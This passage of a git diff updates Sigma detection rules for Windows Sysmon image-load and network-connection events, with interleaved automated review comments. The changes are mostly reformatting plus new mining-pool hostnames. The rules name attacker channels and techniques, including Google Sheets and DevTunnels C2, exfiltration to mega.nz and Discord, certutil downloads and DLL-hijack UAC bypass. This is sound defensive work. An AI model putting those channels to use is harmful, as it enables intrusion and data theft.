process. This - might be indicative of a Python script bundled with Py2Exe. +description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe. references: - https://www.py2exe.org/ - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ 
@@ -23,13 +22,13 @@ detection: selection: Description: Python Core filter_main_generic: - - Image|contains: Python - - Image|startswith: - - C:\Program Files\ - - C:\Program Files (x86)\ - - C:\ProgramData\Anaconda3\ + - Image|contains: Python # FPs with python38.dll, python.exe etc. + - Image|startswith: + - C:\Program Files\ + - C:\Program Files (x86)\ + - C:\ProgramData\Anaconda3\ # Comment out if you don't use Anaconda in your environment filter_optional_aurora: - Image: null + Image: condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate Py2Exe Binaries diff --git a/sigma/sysmon/image_load/image_load_susp_script_dotnet_clr_dll_load.yml b/sigma/sysmon/image_load/image_load_susp_script_dotnet_clr_dll_load.yml index d8d246ff4..7f5d1fb88 100644 --- a/sigma/sysmon/image_load/image_load_susp_script_dotnet_clr_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_susp_script_dotnet_clr_dll_load.yml @@ -1,8 +1,7 @@ title: DotNet CLR DLL Loaded By Scripting Applications id: 4508a70e-97ef-4300-b62b-ff27992990ea status: test -description: Detects .NET CLR DLLs being loaded by scripting applications such as - wscript or cscript. This could be an indication of potential suspicious execution. +description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. references: - https://github.com/tyranid/DotNetToJScript - https://thewover.github.io/Introducing-Donut/ @@ -30,6 +29,7 @@ detection: - \mshta.exe - \msxsl.exe - \regsvr32.exe + # - '\svchost.exe' - \wmic.exe - \wscript.exe ImageLoaded|endswith: diff --git a/sigma/sysmon/image_load/image_load_susp_uncommon_image_load.yml b/sigma/sysmon/image_load/image_load_susp_uncommon_image_load.yml index d94085a0a..abf4754ac 100644 --- a/sigma/sysmon/image_load/image_load_susp_uncommon_image_load.yml 
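Review bot: Rewriting `Image: null` as `Image:` in `filter_optional_aurora` does not change meaning (an empty YAML value is null, which Sigma treats as "field absent"), but it removes the one token that told a reader the filter intentionally matches events with no Image field, and the bare key now reads like an unfinished edit; the same rewrite is made to `commandline_null` in the Suspicious WSMAN Provider Image Loads rule (`@@ -67,9 +66,8 @@`). Keeping the explicit form, `Image: null`, or annotating the empty value, `Image: # null: matches events that carry no Image field (Aurora)`, would preserve the intent for the next maintainer. The rest of the filter block is an indentation-only change.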
+++ b/sigma/sysmon/image_load/image_load_susp_uncommon_image_load.yml @@ -1,8 +1,7 @@ title: Possible Process Hollowing Image Loading id: e32ce4f5-46c6-4c47-ba69-5de3c9193cd7 status: test -description: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. - through process hollowing by Mimikatz +description: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz references: - https://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html author: Markus Neis diff --git a/sigma/sysmon/image_load/image_load_thor_unsigned_execution.yml b/sigma/sysmon/image_load/image_load_thor_unsigned_execution.yml index a20e439b1..cd65034e1 100644 --- a/sigma/sysmon/image_load/image_load_thor_unsigned_execution.yml +++ b/sigma/sysmon/image_load/image_load_thor_unsigned_execution.yml @@ -30,7 +30,6 @@ detection: Signature: Nextron Systems GmbH condition: image_load and (selection and not filter_main) falsepositives: - - Other legitimate binaries named "thor.exe" that aren't published by Nextron - Systems + - Other legitimate binaries named "thor.exe" that aren't published by Nextron Systems level: high ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_uac_bypass_iscsicpl.yml b/sigma/sysmon/image_load/image_load_uac_bypass_iscsicpl.yml index bd4d89796..4295a0cac 100644 --- a/sigma/sysmon/image_load/image_load_uac_bypass_iscsicpl.yml +++ b/sigma/sysmon/image_load/image_load_uac_bypass_iscsicpl.yml 
@@ -1,9 +1,7 @@ title: UAC Bypass Using Iscsicpl - ImageLoad id: 9ed5959a-c43c-4c59-84e3-d28628429456 status: test -description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL - Search Order hijacking technique to load a custom DLL's from temp or a any user - controlled location in the users %PATH% +description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH% references: - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC - https://twitter.com/wdormann/status/1547583317410607110 diff --git a/sigma/sysmon/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml b/sigma/sysmon/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml index e2fd998c0..eec7c6bac 100644 --- a/sigma/sysmon/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml +++ b/sigma/sysmon/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml @@ -1,9 +1,7 @@ title: WMIC Loading Scripting Libraries id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32 status: test -description: Detects threat actors proxy executing code and bypassing application - controls by leveraging wmic and the `/FORMAT` argument switch to download and - execute an XSL file (i.e js, vbs, etc). +description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). references: - https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html - https://twitter.com/dez_/status/986614411711442944 
@@ -31,9 +29,6 @@ detection: falsepositives: - The command wmic os get lastboottuptime loads vbscript.dll - The command wmic os get locale loads vbscript.dll - - Since the ImageLoad event doesn't have enough information in this case. It's - better to look at the recent process creation events that spawned the WMIC - process and investigate the command line and parent/child processes to get - more insights + - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml b/sigma/sysmon/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml index 04a9bc793..d865eb50f 100644 --- a/sigma/sysmon/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml +++ b/sigma/sysmon/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml @@ -1,8 +1,7 @@ title: Wmiprvse Wbemcomn DLL Hijack id: 7707a579-e0d8-4886-a853-ce47e4575aaa status: test -description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` - directory over the network and loading it for a WMI DLL Hijack scenario. +description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) diff --git a/sigma/sysmon/image_load/image_load_wsman_provider_image_load.yml b/sigma/sysmon/image_load/image_load_wsman_provider_image_load.yml index 8fc68ba1a..c027a0ee6 100644 --- a/sigma/sysmon/image_load/image_load_wsman_provider_image_load.yml +++ b/sigma/sysmon/image_load/image_load_wsman_provider_image_load.yml 
@@ -1,8 +1,7 @@ title: Suspicious WSMAN Provider Image Loads id: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94 status: test -description: Detects signs of potential use of the WSMAN provider from uncommon processes - locally and remote execution. +description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. references: - https://twitter.com/chadtilbury/status/1275851297770610688 - https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/ @@ -25,14 +24,14 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational request_client: - - ImageLoaded|endswith: - - \WsmSvc.dll - - \WsmAuto.dll - - \Microsoft.WSMan.Management.ni.dll - - OriginalFileName: - - WsmSvc.dll - - WSMANAUTOMATION.DLL - - Microsoft.WSMan.Management.dll + - ImageLoaded|endswith: + - \WsmSvc.dll + - \WsmAuto.dll + - \Microsoft.WSMan.Management.ni.dll + - OriginalFileName: + - WsmSvc.dll + - WSMANAUTOMATION.DLL + - Microsoft.WSMan.Management.dll respond_server: Image|endswith: \svchost.exe OriginalFileName: WsmWmiPl.dll @@ -41,13 +40,13 @@ detection: - \powershell.exe - C:\Windows\System32\sdiagnhost.exe - C:\Windows\System32\services.exe - filter_svchost: - CommandLine|contains: + filter_svchost: # not available in Sysmon data, but Aurora logs + CommandLine|contains: - svchost.exe -k netsvcs -p -s BITS - svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc - svchost.exe -k NetworkService -p -s Wecsvc - svchost.exe -k netsvcs - filter_mscorsvw: + filter_mscorsvw: # Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe Image|startswith: - C:\Windows\Microsoft.NET\Framework64\v - C:\Windows\Microsoft.NET\Framework\v 
@@ -67,9 +66,8 @@ detection: svchost: Image|endswith: \svchost.exe commandline_null: - CommandLine: null - condition: image_load and (( request_client or respond_server ) and not 1 of filter* - and not ( svchost and commandline_null )) + CommandLine: + condition: image_load and (( request_client or respond_server ) and not 1 of filter* and not ( svchost and commandline_null )) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/network_connection/net_connection_win_addinutil.yml b/sigma/sysmon/network_connection/net_connection_win_addinutil.yml index 8b7f189a6..bf2a41d85 100644 --- a/sigma/sysmon/network_connection/net_connection_win_addinutil.yml +++ b/sigma/sysmon/network_connection/net_connection_win_addinutil.yml @@ -1,8 +1,7 @@ title: Network Connection Initiated By AddinUtil.EXE id: 5205613d-2a63-4412-a895-3a2458b587b3 status: experimental -description: Detects network connections made by the Add-In deployment cache updating - utility (AddInutil.exe), which could indicate command and control communication. +description: Detects network connections made by the Add-In deployment cache updating utility (AddInutil.exe), which could indicate command and control communication. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) diff --git a/sigma/sysmon/network_connection/net_connection_win_binary_susp_com.yml b/sigma/sysmon/network_connection/net_connection_win_binary_susp_com.yml index 00c804bc7..15afd2ed6 100644 --- a/sigma/sysmon/network_connection/net_connection_win_binary_susp_com.yml +++ b/sigma/sysmon/network_connection/net_connection_win_binary_susp_com.yml 
@@ -1,8 +1,8 @@ title: Microsoft Binary Suspicious Communication Endpoint id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97 related: - - id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153 - type: obsoletes + - id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153 + type: obsoletes status: test description: Detects an executable in the Windows folder accessing suspicious domains references: @@ -26,16 +26,16 @@ detection: EventID: 3 Channel: Microsoft-Windows-Sysmon/Operational selection_paths: - - Image|startswith: - - C:\PerfLogs - - C:\Temp\ - - C:\Users\Public\ - - C:\Windows\ - - Image|contains: \AppData\Temp\ + - Image|startswith: + - C:\PerfLogs + - C:\Temp\ + - C:\Users\Public\ + - C:\Windows\ + - Image|contains: \AppData\Temp\ selection_domains: Initiated: 'true' DestinationHostname|endswith: - - .githubusercontent.com + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/sysmon/network_connection/net_connection_win_certutil_initiated_connection.yml b/sigma/sysmon/network_connection/net_connection_win_certutil_initiated_connection.yml index f2655b3a4..62d91ba9f 100644 --- a/sigma/sysmon/network_connection/net_connection_win_certutil_initiated_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_certutil_initiated_connection.yml @@ -1,11 +1,9 @@ title: Connection Initiated Via Certutil.EXE id: 0dba975d-a193-4ed1-a067-424df57570d1 status: test -description: 'Detects a network connection initiated by the certutil.exe tool. - +description: | + Detects a network connection initiated by the certutil.exe tool. Attackers can abuse the utility in order to download malware or additional payloads. - - ' references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil author: frack113, Florian Roth (Nextron Systems) 
diff --git a/sigma/sysmon/network_connection/net_connection_win_crypto_mining_pools.yml b/sigma/sysmon/network_connection/net_connection_win_crypto_mining_pools.yml index 851d34f5c..5e0422783 100644 --- a/sigma/sysmon/network_connection/net_connection_win_crypto_mining_pools.yml +++ b/sigma/sysmon/network_connection/net_connection_win_crypto_mining_pools.yml @@ -5,9 +5,10 @@ description: Detects initiated network connections to crypto mining pools references: - https://www.poolwatch.io/coin/monero - https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt + - https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2021/10/26 -modified: 2023/04/18 +modified: 2024/01/19 tags: - attack.impact - attack.t1496 @@ -26,6 +27,12 @@ detection: - bcn.pool.minergate.com - bcn.vip.pool.minergate.com - bohemianpool.com + - ca-aipg.miningocean.org + - ca-dynex.miningocean.org + - ca-neurai.miningocean.org + - ca-qrl.miningocean.org + - ca-upx.miningocean.org + - ca-zephyr.miningocean.org - ca.minexmr.com - ca.monero.herominers.com - cbd.monerpool.org @@ -37,6 +44,9 @@ detection: - d1pool.ddns.net - d5pool.us - daili01.monerpool.org + - de-aipg.miningocean.org + - de-dynex.miningocean.org + - de-zephyr.miningocean.org - de.minexmr.com - dl.nbminer.com - donate.graef.in 
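Review bot: The six `ca-*.miningocean.org` hosts added in `@@ -26,6 +27,12 @@`, together with the de-, fr-, hk-, sg- and us- entries in the three hunks that follow, enumerate region and coin subdomains of a single pool domain, and the enumeration will fall behind as soon as the pool adds a region or coin. If the list sits under a `DestinationHostname|endswith` modifier (the selection header is outside these hunks) a single entry `- .miningocean.org` would cover every host listed here and any future subdomain, and the roughly thirty host-specific lines could be dropped; if the modifier is an exact match the per-host list is required but should be documented as deliberately incomplete. Worth confirming against the rule's selection before merging the list as-is.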
@@ -54,9 +64,21 @@ detection: - eu.minerpool.pw - fcn-xmr.pool.minergate.com - fee.xmrig.com + - fr-aipg.miningocean.org + - fr-dynex.miningocean.org + - fr-neurai.miningocean.org + - fr-qrl.miningocean.org + - fr-upx.miningocean.org + - fr-zephyr.miningocean.org - fr.minexmr.com - hellominer.com - herominers.com + - hk-aipg.miningocean.org + - hk-dynex.miningocean.org + - hk-neurai.miningocean.org + - hk-qrl.miningocean.org + - hk-upx.miningocean.org + - hk-zephyr.miningocean.org - huadong1-aeon.ppxxmr.com - iwanttoearn.money - jw-js1.ppxxmr.com @@ -151,6 +173,12 @@ detection: - seed6.joulecoin.org - seed7.joulecoin.org - seed8.joulecoin.org + - sg-aipg.miningocean.org + - sg-dynex.miningocean.org + - sg-neurai.miningocean.org + - sg-qrl.miningocean.org + - sg-upx.miningocean.org + - sg-zephyr.miningocean.org - sg.minexmr.com - sheepman.mine.bz - siamining.com @@ -161,7 +189,11 @@ detection: - trtl.cnpool.cc - trtl.pool.mine2gether.com - turtle.miner.rocks + - us-aipg.miningocean.org + - us-dynex.miningocean.org + - us-neurai.miningocean.org - us-west.minexmr.com + - us-zephyr.miningocean.org - usxmrpool.com - viaxmr.com - webservicepag.webhop.net diff --git a/sigma/sysmon/network_connection/net_connection_win_dead_drop_resolvers.yml b/sigma/sysmon/network_connection/net_connection_win_dead_drop_resolvers.yml index 6afb67d8b..33a0927a2 100644 --- a/sigma/sysmon/network_connection/net_connection_win_dead_drop_resolvers.yml +++ b/sigma/sysmon/network_connection/net_connection_win_dead_drop_resolvers.yml 
@@ -1,9 +1,7 @@ title: Potential Dead Drop Resolvers id: 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7 status: test -description: Detects an executable, which is not an internet browser, making DNS request - to legit popular websites, which were seen to be used as dead drop resolvers in - previous attacks. +description: Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. references: - https://content.fireeye.com/apt-41/rpt-apt41 - https://securelist.com/the-tetrade-brazilian-banking-malware/97779/ @@ -68,6 +66,8 @@ detection: - vimeo.com - wetransfer.com - youtube.com + # Note: Add/Remove browsers/applications that you don't use or those that have custom install locations + # Note: To avoid complex conditions the filters for some apps are generic by name only. A custom tuning is recommended for best results filter_main_chrome: Image: - C:\Program Files\Google\Chrome\Application\chrome.exe @@ -87,11 +87,11 @@ detection: - C:\Program Files (x86)\Internet Explorer\iexplore.exe - C:\Program Files\Internet Explorer\iexplore.exe filter_main_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_main_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ 
@@ -103,9 +103,10 @@ detection: Image|endswith: \safari.exe filter_main_defender: Image|endswith: - - \MsMpEng.exe - - \MsSense.exe + - \MsMpEng.exe # Microsoft Defender executable + - \MsSense.exe # Windows Defender Advanced Threat Protection Service Executable filter_main_prtg: + # Paessler's PRTG Network Monitor Image|endswith: - C:\Program Files (x86)\PRTG Network Monitor\PRTG Probe.exe - C:\Program Files\PRTG Network Monitor\PRTG Probe.exe @@ -202,9 +203,10 @@ detection: DestinationHostname|endswith: - discord.com - cdn.discordapp.com + # filter_optional_qlik: + # Image|endswith: '\Engine.exe' # Process from qlik.com app condition: network_connection and (selection and not 1 of filter_main_*) falsepositives: - - One might need to exclude other internet browsers found in it's network or other - applications like ones mentioned above from Microsoft Defender. + - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender. level: high ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_devtunnel_connection.yml b/sigma/sysmon/network_connection/net_connection_win_devtunnel_connection.yml index 4f25f45a1..2ecd9f184 100644 --- a/sigma/sysmon/network_connection/net_connection_win_devtunnel_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_devtunnel_connection.yml 
@@ -1,18 +1,15 @@ title: Network Connection Initiated To DevTunnels Domain id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 related: - - id: 4b657234-038e-4ad5-997c-4be42340bce4 - type: similar - - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 - type: similar - - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b - type: similar + - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode + type: similar + - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode + type: similar + - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels + type: similar status: experimental -description: 'Detects network connections to Devtunnels domains initiated by a process - on a system. Attackers can abuse that feature to establish a reverse shell or - persistence on a machine. - - ' +description: | + Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. references: - https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2 - https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security diff --git a/sigma/sysmon/network_connection/net_connection_win_dfsvc_uncommon_ports.yml b/sigma/sysmon/network_connection/net_connection_win_dfsvc_uncommon_ports.yml index a149ff8bf..9dce50381 100644 --- a/sigma/sysmon/network_connection/net_connection_win_dfsvc_uncommon_ports.yml +++ b/sigma/sysmon/network_connection/net_connection_win_dfsvc_uncommon_ports.yml 
@@ -1,8 +1,7 @@ title: Dfsvc.EXE Network Connection To Uncommon Ports id: 4c5fba4a-9ef6-4f16-823d-606246054741 status: experimental -description: Detects network connections from "dfsvc.exe" used to handled ClickOnce - applications to uncommon ports +description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to uncommon ports references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/network_connection/net_connection_win_dllhost_net_connections.yml b/sigma/sysmon/network_connection/net_connection_win_dllhost_net_connections.yml index 0248626ee..842ad6eae 100644 --- a/sigma/sysmon/network_connection/net_connection_win_dllhost_net_connections.yml +++ b/sigma/sysmon/network_connection/net_connection_win_dllhost_net_connections.yml @@ -44,17 +44,18 @@ detection: - 172.29. - 172.30. - 172.31. - - 169.254. - - '127.' + - 169.254. # link-local address + - '127.' # loopback address filter_ipv6: DestinationIp|startswith: - - ::1 - - 0:0:0:0:0:0:0:1 - - 'fe80:' - - fc - - fd + - ::1 # IPv6 loopback variant + - 0:0:0:0:0:0:0:1 # IPv6 loopback variant + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 filter_msrange: DestinationIp|startswith: + # Subnet: 20.184.0.0/13 - 20.184. - 20.185. - 20.186. @@ -65,13 +66,13 @@ detection: - 20.191. - 23.79. - 51.10. + # Subnet: 51.103.210.0/23 - 51.103. - 51.104. - 51.105. - 52.239. condition: network_connection and (selection and not 1 of filter_*) falsepositives: - - Communication to other corporate systems that use IP addresses from public address - spaces + - Communication to other corporate systems that use IP addresses from public address spaces level: medium ruletype: Sigma 
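Review bot: The new comment `# Subnet: 51.103.210.0/23` in `@@ -65,13 +66,13 @@` sits above `- 51.103.`, but under `DestinationIp|startswith` that prefix excludes all of 51.103.0.0/16, not the /23 the comment names, so the comment understates how much of the public space `filter_msrange` allow-lists (the adjacent `- 51.104.` and `- 51.105.` entries likewise cover whole /16s). Either document what the prefix actually matches, `# 51.103.0.0/16 (includes 51.103.210.0/23)`, or narrow the entry to `- 51.103.210.` and `- 51.103.211.` if only that /23 is intended. The `# Subnet: 20.184.0.0/13` comment in the preceding hunk does agree with its `20.184.`–`20.191.` prefixes.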
diff --git a/sigma/sysmon/network_connection/net_connection_win_excel_outbound_network_connection.yml b/sigma/sysmon/network_connection/net_connection_win_excel_outbound_network_connection.yml index c2cd456ab..ae19e9d8b 100644 --- a/sigma/sysmon/network_connection/net_connection_win_excel_outbound_network_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_excel_outbound_network_connection.yml @@ -1,18 +1,12 @@ title: Excel Network Connections id: 75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84 status: test -description: 'Detects an Excel process that opens suspicious network connections to - non-private IP addresses, and attempts to cover CVE-2021-42292. - - You will likely have to tune this rule for your organization, but it is certainly - something you should look for and could have applications for malicious activity - beyond CVE-2021-42292. - - ' +description: | + Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292. + You will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292. references: - https://corelight.com/blog/detecting-cve-2021-42292 -author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", - Tim Shelton +author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton date: 2021/11/10 modified: 2022/06/27 tags: 
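Review bot: The re-wrapped `author:` line carries over the mismatched quotes around the third handle, `Florian Roth '@Neo23x0"`, while the other handles use matching single quotes; since the line was rewritten anyway this was the moment to fix it. `author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton` keeps the value consistent. As a plain scalar it parses either way, so this is presentation only.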
@@ -53,11 +47,8 @@ detection:
- 127.0.0.1
condition: network_connection and (selection and not filter)
falsepositives:
- - You may have to tune certain domains out that Excel may call out to, such as
- microsoft or other business use case domains.
- - Office documents commonly have templates that refer to external addresses, like
- sharepoint.ourcompany.com may have to be tuned.
- - It is highly recommended to baseline your activity and tune out common business
- use cases.
+ - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.
+ - Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.
+ - It is highly recommended to baseline your activity and tune out common business use cases.
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/network_connection/net_connection_win_google_api_non_browser_access.yml b/sigma/sysmon/network_connection/net_connection_win_google_api_non_browser_access.yml
index e648696de..1c5c98e5f 100644
--- a/sigma/sysmon/network_connection/net_connection_win_google_api_non_browser_access.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_google_api_non_browser_access.yml
@@ -1,8 +1,7 @@
title: Suspicious Non-Browser Network Communication With Google API
id: 7e9cf7b6-e827-11ed-a05b-0242ac120003
status: experimental
-description: Detects a non-browser process interacting with the Google API which could
- indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
+description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
references:
- https://github.com/looCiprian/GC2-sheet
- https://youtu.be/n2dFlSaBBKo
@@ -24,7 +23,7 @@ detection:
EventID: 3
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- DestinationHostname|contains:
+ DestinationHostname|contains: # Other googleapis should be added as the GC2 tool evolves
- oauth2.googleapis.com
- sheets.googleapis.com
- drive.googleapis.com
@@ -49,11 +48,11 @@ detection:
filter_optional_maxthon:
Image|endswith: \maxthon.exe
filter_optional_edge_1:
- - Image|contains: :\Program Files (x86)\Microsoft\EdgeWebView\Application\
- - Image|endswith:
- - :\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
- - :\Program Files\Microsoft\Edge\Application\msedge.exe
- - \WindowsApps\MicrosoftEdge.exe
+ - Image|contains: :\Program Files (x86)\Microsoft\EdgeWebView\Application\
+ - Image|endswith:
+ - :\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+ - :\Program Files\Microsoft\Edge\Application\msedge.exe
+ - \WindowsApps\MicrosoftEdge.exe
filter_optional_edge_2:
Image|contains:
- :\Program Files (x86)\Microsoft\EdgeCore\
@@ -79,8 +78,6 @@ detection:
Image|endswith: \teams.exe
condition: network_connection and (selection and not 1 of filter_optional_*)
falsepositives:
- - Legitimate applications communicating with the "googleapis.com" endpoints that
- are not already in the exclusion list. This is environmental dependent and
- requires further testing and tuning.
+ - Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning.
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/network_connection/net_connection_win_hh.yml b/sigma/sysmon/network_connection/net_connection_win_hh.yml
index bc5e30b98..94a008547 100644
--- a/sigma/sysmon/network_connection/net_connection_win_hh.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_hh.yml
@@ -1,11 +1,10 @@
title: HH.EXE Network Connections
id: 468a8cea-2920-4909-a593-0cbe1d96674a
related:
- - id: f57c58b3-ee69-4ef5-9041-455bf39aaa89
- type: derived
+ - id: f57c58b3-ee69-4ef5-9041-455bf39aaa89
+ type: derived
status: test
-description: Detects network connections made by the "hh.exe" process, which could
- indicate the execution/download of remotely hosted .chm files
+description: Detects network connections made by the "hh.exe" process, which could indicate the execution/download of remotely hosted .chm files
references:
- https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html
- https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md
diff --git a/sigma/sysmon/network_connection/net_connection_win_imewdbld.yml b/sigma/sysmon/network_connection/net_connection_win_imewdbld.yml
index 943c118bf..366a01210 100644
--- a/sigma/sysmon/network_connection/net_connection_win_imewdbld.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_imewdbld.yml
@@ -1,11 +1,10 @@
title: Network Connection Initiated By IMEWDBLD.EXE
id: 8d7e392e-9b28-49e1-831d-5949c6281228
related:
- - id: 863218bd-c7d0-4c52-80cd-0a96c09f54af
- type: derived
+ - id: 863218bd-c7d0-4c52-80cd-0a96c09f54af
+ type: derived
status: test
-description: Detects network connections initiated by IMEWDBLD. This might indicate
- potential abuse to download arbitrary files via this utility
+description: Detects network connections initiated by IMEWDBLD. This might indicate potential abuse to download arbitrary files via this utility
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download
- https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/
@@ -29,5 +28,6 @@ detection:
condition: network_connection and selection
falsepositives:
- Unknown
+# Note: Please reduce this to medium if you find legitimate connections
level: high
ruletype: Sigma
diff --git a/sigma/sysmon/network_connection/net_connection_win_mega_nz.yml b/sigma/sysmon/network_connection/net_connection_win_mega_nz.yml
index 73be25b04..01ad5e43a 100644
--- a/sigma/sysmon/network_connection/net_connection_win_mega_nz.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_mega_nz.yml
@@ -1,8 +1,7 @@
title: Communication To Mega.nz
id: fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4
status: test
-description: Detects an executable accessing mega.co.nz, which could be a sign of
- forbidden file sharing use of data exfiltration by malicious actors
+description: Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors
references:
- https://megatools.megous.com/
- https://www.mandiant.com/resources/russian-targeting-gov-business
diff --git a/sigma/sysmon/network_connection/net_connection_win_msiexec.yml b/sigma/sysmon/network_connection/net_connection_win_msiexec.yml
index 1e48b1f39..ded7ea57d 100644
--- a/sigma/sysmon/network_connection/net_connection_win_msiexec.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_msiexec.yml
@@ -1,12 +1,9 @@
title: Msiexec Initiated Connection
id: 8e5e38e4-5350-4c0b-895a-e872ce0dd54f
status: test
